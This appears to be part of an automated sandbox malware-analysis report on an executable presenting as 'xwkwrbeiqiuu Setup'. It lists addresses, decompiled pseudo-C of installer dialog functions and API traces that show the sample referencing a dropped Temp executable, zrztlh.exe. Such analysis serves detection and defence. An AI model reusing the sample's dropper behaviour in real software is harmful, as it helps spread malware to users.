                0x00000000
                0x00000000
                0x00000000
                0x004065aa
                0x004065aa
                0x004065ae
                0x004068d5
                0x00000000
                0x004068d5
                0x004065b4
                0x004065b7
                0x004065ba
                0x004065be
                0x004065c1
                0x004065c7
                0x004065c9
                0x004065c9
                0x004065c9
                0x004065cc
                0x00000000
                0x00000000
                0x0040637a
                0x0040637a
                0x0040637d
                0x00000000
                0x00000000
                0x004066b9
                0x004066bd
                0x004066df
                0x004066e2
                0x004066ec
                0x00000000
                0x004066ec
                0x004066bf
                0x004066c2
                0x004066c6
                0x004066c9
                0x004066c9
                0x004066cc
                0x00000000
                0x00000000
                0x00406776
                0x0040677a
                0x00406798
                0x00406798
                0x00406798
                0x0040679f
                0x004067a6
                0x004067ad
                0x004067ad
                0x00000000
                0x004067ad
                0x0040677c
                0x0040677f
                0x00406782
                0x00406785
                0x0040678c
                0x004066d0
                0x004066d0
                0x004066d3
                0x00000000
                0x00000000
                0x00406867
                0x0040686a
                0x00000000
                0x00000000
                0x004064a1
                0x004064a3
                0x004064aa
                0x004064ab
                0x004064ad
                0x004064b0
                0x00000000
                0x00000000
                0x004064b8
                0x004064bb
                0x004064be
                0x004064c0
                0x004064c2
                0x004064c2
                0x004064c3
                0x004064c6
                0x004064cd
                0x004064d0
                0x004064de
                0x00000000
                0x00000000
                0x004067b4
                0x004067b4
                0x004067b7
                0x004067be
                0x00000000
                0x00000000
                0x004067c3
                0x004067c3
                0x004067c7
                0x004068ff
                0x00000000
                0x004068ff
                0x004067cd
                0x004067d0
                0x004067d3
                0x004067d7
                0x004067da
                0x004067e0
                0x004067e2
                0x004067e2
                0x004067e2
                0x004067e5
                0x004067e8
                0x004067e8
                0x004067e8
                0x004067e8
                0x004067eb
                0x004067eb
                0x004067ef
                0x0040684f
                0x00406852
                0x00406857
                0x00406858
                0x0040685a
                0x0040685c
                0x0040685f
                0x00000000
                0x0040685f
                0x004067f1
                0x004067f7
                0x004067fa
                0x004067fd
                0x00406800
                0x00406803
                0x00406806
                0x00406809
                0x0040680c
                0x0040680f
                0x00406812
                0x0040682b
                0x0040682e
                0x00406831
                0x00406834
                0x00406838
                0x0040683a
                0x0040683a
                0x0040683b
                0x0040683e
                0x00406814
                0x00406814
                0x0040681c
                0x00406821
                0x00406823
                0x00406826
                0x00406826
                0x00406841
                0x00406848
                0x00000000
                0x0040684a
                0x00000000
                0x0040684a
                0x00000000
                0x004064e6
                0x004064e9
                0x0040651f
                0x0040664f
                0x0040664f
                0x0040664f
                0x0040664f
                0x00406652
                0x00406652
                0x00406655
                0x00406657
                0x004068e1
                0x00000000
                0x004068e1
                0x0040665d
                0x00406660
                0x00000000
                0x00000000
                0x00406666
                0x0040666a
                0x0040666d
                0x0040666d
                0x0040666d
                0x00000000
                0x0040666d
                0x004064eb
                0x004064ed
                0x004064ef
                0x004064f1
                0x004064f4
                0x004064f5
                0x004064f7
                0x004064f9
                0x004064fc
                0x004064ff
                0x00406515
                0x0040651a
                0x00406552
                0x00406552
                0x00406556
                0x00406582
                0x00406584
                0x0040658b
                0x0040658e
                0x00406591
                0x00406591
                0x00406596
                0x00406596
                0x00406598
                0x0040659b
                0x004065a2
                0x004065a5
                0x004065d2
                0x004065d2
                0x004065d5
                0x004065d8
                0x0040664c
                0x0040664c
                0x0040664c
                0x00000000
                0x0040664c
                0x004065da
                0x004065e0
                0x004065e3
                0x004065e6
                0x004065e9
                0x004065ec
                0x004065ef
                0x004065f2
                0x004065f5
                0x004065f8
                0x004065fb
                0x00406614
                0x00406616
                0x00406619
                0x0040661a
                0x0040661d
                0x0040661f
                0x00406622
                0x00406624
                0x00406626
                0x00406629
                0x0040662b
                0x0040662e
                0x00406632
                0x00406634
                0x00406634
                0x00406635
                0x00406638
                0x0040663b
                0x004065fd
                0x004065fd
                0x00406605
                0x0040660a
                0x0040660c
                0x0040660f
                0x0040660f
                0x0040663e
                0x00406645
                0x004065cf
                0x004065cf
                0x004065cf
                0x004065cf
                0x00000000
                0x00406647
                0x00000000
                0x00406647
                0x00406645
                0x00406558
                0x0040655b
                0x0040655d
                0x00406560
                0x00406563
                0x00406566
                0x00406568
                0x0040656b
                0x0040656e
                0x0040656e
                0x00406571
                0x00406571
                0x00406574
                0x0040657b
                0x0040654f
                0x0040654f
                0x0040654f
                0x0040654f
                0x00000000
                0x0040657d
                0x00000000
                0x0040657d
                0x0040657b
                0x00406501
                0x00406504
                0x00406506
                0x00406509
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004063f3
                0x004063f3
                0x004063f7
                0x004068bd
                0x00000000
                0x004068bd
                0x004063fd
                0x00406400
                0x00406403
                0x00406406
                0x00406408
                0x00406408
                0x00406408
                0x0040640b
                0x0040640e
                0x00406411
                0x00406414
                0x00406417
                0x0040641a
                0x0040641b
                0x0040641d
                0x0040641d
                0x0040641d
                0x00406420
                0x00406423
                0x00406426
                0x00406429
                0x00406429
                0x00406429
                0x0040642c
                0x00000000
                0x00000000
                0x00406670
                0x00406670
                0x00406670
                0x00406674
                0x00000000
                0x00000000
                0x0040667a
                0x0040667d
                0x00406680
                0x00406683
                0x00406685
                0x00406685
                0x00406685
                0x00406688
                0x0040668b
                0x0040668e
                0x00406691
                0x00406694
                0x00406697
                0x00406698
                0x0040669a
                0x0040669a
                0x0040669a
                0x0040669d
                0x004066a0
                0x004066a3
                0x004066a6
                0x004066a9
                0x004066ad
                0x004066af
                0x004066b2
                0x00000000
                0x004066b4
                0x00000000
                0x004066b4
                0x004066b2
                0x004068e7
                0x00000000
                0x00000000
                0x00405f16

                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4e74e6640404211f02dbcf3e5cdd51f183378cde3108f959ef2b494a3a8ff7bc
                • Instruction ID: eeb6df0b4c754b004cb91f1e651764525fca86d3ed66ed31f7f656e6c0f0dc00
                • Opcode Fuzzy Hash: 4e74e6640404211f02dbcf3e5cdd51f183378cde3108f959ef2b494a3a8ff7bc
                • Instruction Fuzzy Hash: B7F17671D00269CBDF28CFA8C8946ADBBB0FF44305F25816ED856BB281D7385A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 104 403a22-403a34 105 403b75-403b84 104->105 106 403a3a-403a40 104->106 108 403bd3-403be8 105->108 109 403b86-403bc1 GetDlgItem * 2 call 403ef5 KiUserCallbackDispatcher call 40140b 105->109 106->105 107 403a46-403a4f 106->107 110 403a51-403a5e SetWindowPos 107->110 111 403a64-403a67 107->111 113 403c28-403c2d call 403f41 108->113 114 403bea-403bed 108->114 131 403bc6-403bce 109->131 110->111 115 403a81-403a87 111->115 116 403a69-403a7b ShowWindow 111->116 121 403c32-403c4d 113->121 118 403c20-403c22 114->118 119 403bef-403bfa call 401389 114->119 122 403aa3-403aa6 115->122 123 403a89-403a9e DestroyWindow 115->123 116->115 118->113 126 403ec2 118->126 119->118 141 403bfc-403c1b SendMessageA 119->141 127 403c56-403c5c 121->127 128 403c4f-403c51 call 40140b 121->128 132 403aa8-403ab4 SetWindowLongA 122->132 133 403ab9-403abf 122->133 130 403e9f-403ea5 123->130 129 403ec4-403ecb 126->129 137 403e80-403e99 DestroyWindow EndDialog 127->137 138 403c62-403c6d 127->138 128->127 130->126 135 403ea7-403ead 130->135 131->108 132->129 139 403b62-403b70 call 403f5c 133->139 140 403ac5-403ad6 GetDlgItem 133->140 135->126 142 403eaf-403eb8 ShowWindow 135->142 137->130 138->137 143 403c73-403cc0 call 405b16 call 403ef5 * 3 GetDlgItem 138->143 139->129 144 403af5-403af8 140->144 145 403ad8-403aef SendMessageA IsWindowEnabled 140->145 141->129 142->126 174 403cc2-403cc7 143->174 175 403cca-403d06 ShowWindow EnableWindow call 403f17 EnableWindow 143->175 149 403afa-403afb 144->149 150 403afd-403b00 144->150 145->126 145->144 152 403b2b-403b30 call 403ece 149->152 153 403b02-403b08 150->153 154 403b0e-403b13 150->154 152->139 156 403b49-403b5c SendMessageA 153->156 159 403b0a-403b0c 153->159 155 403b15-403b1b 154->155 154->156 160 403b32-403b3b call 40140b 155->160 161 403b1d-403b23 call 40140b 155->161 156->139 159->152 160->139 171 403b3d-403b47 160->171 170 403b29 161->170 170->152 171->170 174->175 178 403d08-403d09 175->178 179 403d0b 175->179 
180 403d0d-403d3b GetSystemMenu EnableMenuItem SendMessageA 178->180 179->180 181 403d50 180->181 182 403d3d-403d4e SendMessageA 180->182 183 403d56-403d8f call 403f2a call 405af4 lstrlenA call 405b16 SetWindowTextA call 401389 181->183 182->183 183->121 192 403d95-403d97 183->192 192->121 193 403d9d-403da1 192->193 194 403dc0-403dd4 DestroyWindow 193->194 195 403da3-403da9 193->195 194->130 197 403dda-403e07 CreateDialogParamA 194->197 195->126 196 403daf-403db5 195->196 196->121 198 403dbb 196->198 197->130 199 403e0d-403e64 call 403ef5 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 197->199 198->126 199->126 204 403e66-403e7e ShowWindow call 403f41 199->204 204->130
                C-Code - Quality: 77%
                			E00403A22(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                				struct HWND__* _v32;
                				void* _v80;
                				void* _v84;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t35;
                				signed int _t37;
                				signed int _t39;
                				intOrPtr _t44;
                				struct HWND__* _t49;
                				signed int _t67;
                				struct HWND__* _t73;
                				signed int _t86;
                				struct HWND__* _t91;
                				signed int _t99;
                				int _t103;
                				signed int _t115;
                				signed int _t116;
                				int _t117;
                				signed int _t122;
                				struct HWND__* _t125;
                				struct HWND__* _t126;
                				int _t127;
                				long _t130;
                				int _t132;
                				int _t133;
                				void* _t134;
                				void* _t141;
                				void* _t142;
                
                				_t115 = _a8;
                				if(_t115 == 0x110 || _t115 == 0x408) {
                					_t35 = _a12;
                					_t125 = _a4;
                					__eflags = _t115 - 0x110;
                					 *0x420514 = _t35;
                					if(_t115 == 0x110) {
                						 *0x423f24 = _t125;
                						 *0x420528 = GetDlgItem(_t125, 1);
                						_t91 = GetDlgItem(_t125, 2);
                						_push(0xffffffff);
                						_push(0x1c);
                						 *0x41f4f0 = _t91;
                						E00403EF5(_t125);
                						SetClassLongA(_t125, 0xfffffff2,  *0x423708); // executed
                						 *0x4236ec = E0040140B(4);
                						_t35 = 1;
                						__eflags = 1;
                						 *0x420514 = 1;
                					}
                					_t122 =  *0x409238; // 0x0
                					_t133 = 0;
                					_t130 = (_t122 << 6) +  *0x423f40;
                					__eflags = _t122;
                					if(_t122 < 0) {
                						L34:
                						E00403F41(0x40b);
                						while(1) {
                							_t37 =  *0x420514;
                							 *0x409238 =  *0x409238 + _t37;
                							_t130 = _t130 + (_t37 << 6);
                							_t39 =  *0x409238; // 0x0
                							__eflags = _t39 -  *0x423f44; // 0x2
                							if(__eflags == 0) {
                								E0040140B(1);
                							}
                							__eflags =  *0x4236ec - _t133; // 0x7fffffff
                							if(__eflags != 0) {
                								break;
                							}
                							_t44 =  *0x423f44; // 0x2
                							__eflags =  *0x409238 - _t44; // 0x0
                							if(__eflags >= 0) {
                								break;
                							}
                							_push( *((intOrPtr*)(_t130 + 0x24)));
                							_t116 =  *(_t130 + 0x14);
                							_push(0x42b800);
                							E00405B16(_t116, _t125, _t130);
                							_push( *((intOrPtr*)(_t130 + 0x20)));
                							_push(0xfffffc19);
                							E00403EF5(_t125);
                							_push( *((intOrPtr*)(_t130 + 0x1c)));
                							_push(0xfffffc1b);
                							E00403EF5(_t125);
                							_push( *((intOrPtr*)(_t130 + 0x28)));
                							_push(0xfffffc1a);
                							E00403EF5(_t125);
                							_t49 = GetDlgItem(_t125, 3);
                							__eflags =  *0x423fac - _t133; // 0x0
                							_v32 = _t49;
                							if(__eflags != 0) {
                								_t116 = _t116 & 0x0000fefd | 0x00000004;
                								__eflags = _t116;
                							}
                							ShowWindow(_t49, _t116 & 0x00000008);
                							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
                							E00403F17(_t116 & 0x00000002);
                							_t117 = _t116 & 0x00000004;
                							EnableWindow( *0x41f4f0, _t117);
                							__eflags = _t117 - _t133;
                							if(_t117 == _t133) {
                								_push(1);
                							} else {
                								_push(_t133);
                							}
                							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                							__eflags =  *0x423fac - _t133; // 0x0
                							if(__eflags == 0) {
                								_push( *0x420528);
                							} else {
                								SendMessageA(_t125, 0x401, 2, _t133);
                								_push( *0x41f4f0);
                							}
                							E00403F2A();
                							E00405AF4(0x420530, "xwkwrbeiqiuu Setup");
                							_push( *((intOrPtr*)(_t130 + 0x18)));
                							_push( &(0x420530[lstrlenA(0x420530)]));
                							E00405B16(0x420530, _t125, _t130);
                							SetWindowTextA(_t125, 0x420530);
                							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)), _t133);
                							__eflags = _t67;
                							if(_t67 != 0) {
                								continue;
                							} else {
                								__eflags =  *_t130 - _t133;
                								if( *_t130 == _t133) {
                									continue;
                								}
                								__eflags =  *(_t130 + 4) - 5;
                								if( *(_t130 + 4) != 5) {
                									DestroyWindow( *0x4236f8);
                									 *0x41fd00 = _t130;
                									__eflags =  *_t130 - _t133;
                									if( *_t130 <= _t133) {
                										goto L58;
                									}
                									_t73 = CreateDialogParamA( *0x423f20,  *_t130 +  *0x423700 & 0x0000ffff, _t125,  *( *(_t130 + 4) * 4 + "=@@"), _t130);
                									__eflags = _t73 - _t133;
                									 *0x4236f8 = _t73;
                									if(_t73 == _t133) {
                										goto L58;
                									}
                									_push( *((intOrPtr*)(_t130 + 0x2c)));
                									_push(6);
                									E00403EF5(_t73);
                									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                									ScreenToClient(_t125, _t134 + 0x10);
                									SetWindowPos( *0x4236f8, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                									E00401389( *((intOrPtr*)(_t130 + 0xc)), _t133);
                									__eflags =  *0x4236ec - _t133; // 0x7fffffff
                									if(__eflags != 0) {
                										goto L61;
                									}
                									ShowWindow( *0x4236f8, 8);
                									E00403F41(0x405);
                									goto L58;
                								}
                								__eflags =  *0x423fac - _t133; // 0x0
                								if(__eflags != 0) {
                									goto L61;
                								}
                								__eflags =  *0x423fa0 - _t133; // 0x0
                								if(__eflags != 0) {
                									continue;
                								}
                								goto L61;
                							}
                						}
                						DestroyWindow( *0x4236f8); // executed
                						 *0x423f24 = _t133;
                						EndDialog(_t125,  *0x41f8f8);
                						goto L58;
                					} else {
                						__eflags = _t35 - 1;
                						if(_t35 != 1) {
                							L33:
                							__eflags =  *_t130 - _t133;
                							if( *_t130 == _t133) {
                								goto L61;
                							}
                							goto L34;
                						}
                						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)), 0);
                						__eflags = _t86;
                						if(_t86 == 0) {
                							goto L33;
                						}
                						SendMessageA( *0x4236f8, 0x40f, 0, 1);
                						__eflags =  *0x4236ec - _t133; // 0x7fffffff
                						return 0 | __eflags == 0x00000000;
                					}
                				} else {
                					_t125 = _a4;
                					_t133 = 0;
                					if(_t115 == 0x47) {
                						SetWindowPos( *0x420508, _t125, 0, 0, 0, 0, 0x13);
                					}
                					if(_t115 == 5) {
                						asm("sbb eax, eax");
                						ShowWindow( *0x420508,  ~(_a12 - 1) & _t115);
                					}
                					if(_t115 != 0x40d) {
                						__eflags = _t115 - 0x11;
                						if(_t115 != 0x11) {
                							__eflags = _t115 - 0x111;
                							if(_t115 != 0x111) {
                								L26:
                								return E00403F5C(_t115, _a12, _a16);
                							}
                							_t132 = _a12 & 0x0000ffff;
                							_t126 = GetDlgItem(_t125, _t132);
                							__eflags = _t126 - _t133;
                							if(_t126 == _t133) {
                								L13:
                								__eflags = _t132 - 1;
                								if(_t132 != 1) {
                									__eflags = _t132 - 3;
                									if(_t132 != 3) {
                										_t127 = 2;
                										__eflags = _t132 - _t127;
                										if(_t132 != _t127) {
                											L25:
                											SendMessageA( *0x4236f8, 0x111, _a12, _a16);
                											goto L26;
                										}
                										__eflags =  *0x423fac - _t133; // 0x0
                										if(__eflags == 0) {
                											_t99 = E0040140B(3);
                											__eflags = _t99;
                											if(_t99 != 0) {
                												goto L26;
                											}
                											 *0x41f8f8 = 1;
                											L21:
                											_push(0x78);
                											L22:
                											E00403ECE();
                											goto L26;
                										}
                										E0040140B(_t127);
                										 *0x41f8f8 = _t127;
                										goto L21;
                									}
                									__eflags =  *0x409238 - _t133; // 0x0
                									if(__eflags <= 0) {
                										goto L25;
                									}
                									_push(0xffffffff);
                									goto L22;
                								}
                								_push(_t132);
                								goto L22;
                							}
                							SendMessageA(_t126, 0xf3, _t133, _t133);
                							_t103 = IsWindowEnabled(_t126);
                							__eflags = _t103;
                							if(_t103 == 0) {
                								goto L61;
                							}
                							goto L13;
                						}
                						SetWindowLongA(_t125, _t133, _t133);
                						return 1;
                					} else {
                						DestroyWindow( *0x4236f8);
                						 *0x4236f8 = _a12;
                						L58:
                						_t141 =  *0x421530 - _t133; // 0x0
                						if(_t141 == 0) {
                							_t142 =  *0x4236f8 - _t133; // 0x0
                							if(_t142 != 0) {
                								ShowWindow(_t125, 0xa);
                								 *0x421530 = 1;
                							}
                						}
                						L61:
                						return 0;
                					}
                				}
                			}

                APIs
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A5E
                • ShowWindow.USER32(?), ref: 00403A7B
                • DestroyWindow.USER32 ref: 00403A8F
                • SetWindowLongA.USER32 ref: 00403AAB
                • GetDlgItem.USER32 ref: 00403ACC
                • SendMessageA.USER32 ref: 00403AE0
                • IsWindowEnabled.USER32(00000000), ref: 00403AE7
                • GetDlgItem.USER32 ref: 00403B95
                • GetDlgItem.USER32 ref: 00403B9F
                • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403BB9
                • SendMessageA.USER32 ref: 00403C0A
                • GetDlgItem.USER32 ref: 00403CB0
                • ShowWindow.USER32(00000000,?), ref: 00403CD1
                • EnableWindow.USER32(?,?), ref: 00403CE3
                • EnableWindow.USER32(?,?), ref: 00403CFE
                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D14
                • EnableMenuItem.USER32 ref: 00403D1B
                • SendMessageA.USER32 ref: 00403D33
                • SendMessageA.USER32 ref: 00403D46
                • lstrlenA.KERNEL32(00420530,?,00420530,xwkwrbeiqiuu Setup), ref: 00403D6F
                • SetWindowTextA.USER32(?,00420530), ref: 00403D7E
                • ShowWindow.USER32(?,0000000A), ref: 00403EB2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                • String ID: xwkwrbeiqiuu Setup
                • API String ID: 4050669955-1811721691
                • Opcode ID: 1ea3c2a88b1d1f312b806789cbcc4bcb404401e61963c7eaf7926aa73dfb699e
                • Instruction ID: a83dcc86622e640bdf6b153063aa13b6230d1eae5258657c65e28bef3e163658
                • Opcode Fuzzy Hash: 1ea3c2a88b1d1f312b806789cbcc4bcb404401e61963c7eaf7926aa73dfb699e
                • Instruction Fuzzy Hash: E8C1D171A04205BBDB21AF21ED45D2B7EBCEB44706F50053EF601B12F1C779AA829B1E
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 207 4036a1-4036b9 call 405dda 210 4036bb-4036cb call 405a52 207->210 211 4036cd-4036f4 call 4059db 207->211 219 403717-403736 call 403955 call 4056c8 210->219 215 4036f6-403707 call 4059db 211->215 216 40370c-403712 lstrcatA 211->216 215->216 216->219 225 40373c-403741 219->225 226 4037bd-4037c5 call 4056c8 219->226 225->226 227 403743-403767 call 4059db 225->227 232 4037d3-4037f8 LoadImageA 226->232 233 4037c7-4037ce call 405b16 226->233 227->226 236 403769-40376b 227->236 234 403887-40388f call 40140b 232->234 235 4037fe-403834 RegisterClassA 232->235 233->232 249 403891-403894 234->249 250 403899-4038a4 call 403955 234->250 238 40383a-403882 SystemParametersInfoA CreateWindowExA 235->238 239 40394b 235->239 241 40377c-403788 lstrlenA 236->241 242 40376d-40377a call 405612 236->242 238->234 246 40394d-403954 239->246 243 4037b0-4037b8 call 4055e7 call 405af4 241->243 244 40378a-403798 lstrcmpiA 241->244 242->241 243->226 244->243 248 40379a-4037a4 GetFileAttributesA 244->248 253 4037a6-4037a8 248->253 254 4037aa-4037ab call 40562e 248->254 249->246 260 403922-40392a call 404f71 250->260 261 4038a6-4038c3 ShowWindow LoadLibraryA 250->261 253->243 253->254 254->243 268 403944-403946 call 40140b 260->268 269 40392c-403932 260->269 263 4038c5-4038ca LoadLibraryA 261->263 264 4038cc-4038de GetClassInfoA 261->264 263->264 266 4038e0-4038f0 GetClassInfoA RegisterClassA 264->266 267 4038f6-403919 DialogBoxParamA call 40140b 264->267 266->267 273 40391e-403920 267->273 268->239 269->249 271 403938-40393f call 40140b 269->271 271->249 273->246
                C-Code - Quality: 89%
                			E004036A1() {
                				intOrPtr _v4;
                				intOrPtr _v8;
                				int _v12;
                				int _v16;
                				char _v20;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				intOrPtr* _t20;
                				signed int _t24;
                				void* _t28;
                				void* _t30;
                				int _t31;
                				void* _t34;
                				struct HINSTANCE__* _t37;
                				int _t38;
                				intOrPtr _t39;
                				int _t42;
                				intOrPtr _t59;
                				char _t61;
                				CHAR* _t63;
                				signed char _t67;
                				struct HINSTANCE__* _t75;
                				CHAR* _t78;
                				intOrPtr _t80;
                				CHAR* _t84;
                				CHAR* _t85;
                
                				_t80 =  *0x423f28; // 0x74d188
                				_t20 = E00405DDA(6);
                				_t87 = _t20;
                				if(_t20 == 0) {
                					_t78 = 0x420530;
                					"1033" = 0x7830;
                					E004059DB(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420530, 0);
                					__eflags =  *0x420530;
                					if(__eflags == 0) {
                						E004059DB(0x80000003, ".DEFAULT\\Control Panel\\International",  &M004072FE, 0x420530, 0);
                					}
                					lstrcatA("1033", _t78);
                				} else {
                					E00405A52("1033",  *_t20() & 0x0000ffff);
                				}
                				E00403955(_t75, _t87);
                				_t24 =  *0x423f30; // 0x80
                				_t84 = "C:\\Users\\alfons\\AppData\\Local\\Temp";
                				 *0x423fa0 = _t24 & 0x00000020;
                				if(E004056C8(_t87, _t84) != 0) {
                					L16:
                					if(E004056C8(_t95, _t84) == 0) {
                						_push( *((intOrPtr*)(_t80 + 0x118)));
                						_push(_t84);
                						E00405B16(0, _t78, _t80);
                					}
                					_t28 = LoadImageA( *0x423f20, 0x67, 1, 0, 0, 0x8040); // executed
                					 *0x423708 = _t28;
                					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
                						L21:
                						if(E0040140B(0) == 0) {
                							_t30 = E00403955(_t75, __eflags);
                							__eflags =  *0x423fc0; // 0x0
                							if(__eflags != 0) {
                								_t31 = E00404F71(_t30, 0);
                								__eflags = _t31;
                								if(_t31 == 0) {
                									E0040140B(1);
                									goto L33;
                								}
                								__eflags =  *0x4236ec; // 0x7fffffff
                								if(__eflags == 0) {
                									E0040140B(2);
                								}
                								goto L22;
                							}
                							ShowWindow( *0x420508, 5); // executed
                							_t37 = LoadLibraryA("RichEd20"); // executed
                							__eflags = _t37;
                							if(_t37 == 0) {
                								LoadLibraryA("RichEd32");
                							}
                							_t85 = "RichEdit20A";
                							_t38 = GetClassInfoA(0, _t85, 0x4236c0);
                							__eflags = _t38;
                							if(_t38 == 0) {
                								GetClassInfoA(0, "RichEdit", 0x4236c0);
                								 *0x4236e4 = _t85;
                								RegisterClassA(0x4236c0);
                							}
                							_t39 =  *0x423700; // 0x0
                							_t42 = DialogBoxParamA( *0x423f20, _t39 + 0x00000069 & 0x0000ffff, 0, E00403A22, 0); // executed
                							E0040140B(5);
                							return _t42;
                						}
                						L22:
                						_t34 = 2;
                						return _t34;
                					} else {
                						_t75 =  *0x423f20; // 0x400000
                						 *0x4236d4 = _t28;
                						_v20 = 0x624e5f;
                						 *0x4236c4 = E00401000;
                						 *0x4236d0 = _t75;
                						 *0x4236e4 =  &_v20;
                						if(RegisterClassA(0x4236c0) == 0) {
                							L33:
                							__eflags = 0;
                							return 0;
                						}
                						_t12 =  &_v16; // 0x624e5f
                						SystemParametersInfoA(0x30, 0, _t12, 0);
                						 *0x420508 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423f20, 0);
                						goto L21;
                					}
                				} else {
                					_t75 =  *(_t80 + 0x48);
                					if(_t75 == 0) {
                						goto L16;
                					}
                					_t59 =  *0x423f58; // 0x74eb84
                					_t78 = 0x422ec0;
                					E004059DB( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) + _t59, 0x422ec0, 0);
                					_t61 =  *0x422ec0; // 0x43
                					if(_t61 == 0) {
                						goto L16;
                					}
                					if(_t61 == 0x22) {
                						_t78 = 0x422ec1;
                						 *((char*)(E00405612(0x422ec1, 0x22))) = 0;
                					}
                					_t63 = lstrlenA(_t78) + _t78 - 4;
                					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
                						L15:
                						E00405AF4(_t84, E004055E7(_t78));
                						goto L16;
                					} else {
                						_t67 = GetFileAttributesA(_t78);
                						if(_t67 == 0xffffffff) {
                							L14:
                							E0040562E(_t78);
                							goto L15;
                						}
                						_t95 = _t67 & 0x00000010;
                						if((_t67 & 0x00000010) != 0) {
                							goto L15;
                						}
                						goto L14;
                					}
                				}
                			}

                APIs
                  • Part of subcall function 00405DDA: GetModuleHandleA.KERNEL32(4B004178,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405DEC
                  • Part of subcall function 00405DDA: LoadLibraryA.KERNEL32(4B004178,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405DF7
                  • Part of subcall function 00405DDA: GetProcAddress.KERNEL32(00000000,454E5245), ref: 00405E08
                • lstrcatA.KERNEL32(1033,00420530,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420530,00000000,00000006,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403712
                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,?,?,?,C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,00000000,C:\Users\user\AppData\Local\Temp,1033,00420530,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420530,00000000,00000006,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ), ref: 0040377D
                • lstrcmpiA.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,?,?,?,C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,00000000,C:\Users\user\AppData\Local\Temp,1033,00420530,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420530,00000000), ref: 00403790
                • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx), ref: 0040379B
                • LoadImageA.USER32 ref: 004037E4
                  • Part of subcall function 00405A52: wsprintfA.USER32 ref: 00405A5F
                • RegisterClassA.USER32 ref: 0040382B
                • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403843
                • CreateWindowExA.USER32 ref: 0040387C
                • ShowWindow.USER32(00000005,00000000), ref: 004038AE
                • LoadLibraryA.KERNELBASE(RichEd20), ref: 004038BF
                • LoadLibraryA.KERNEL32(RichEd32), ref: 004038CA
                • GetClassInfoA.USER32 ref: 004038DA
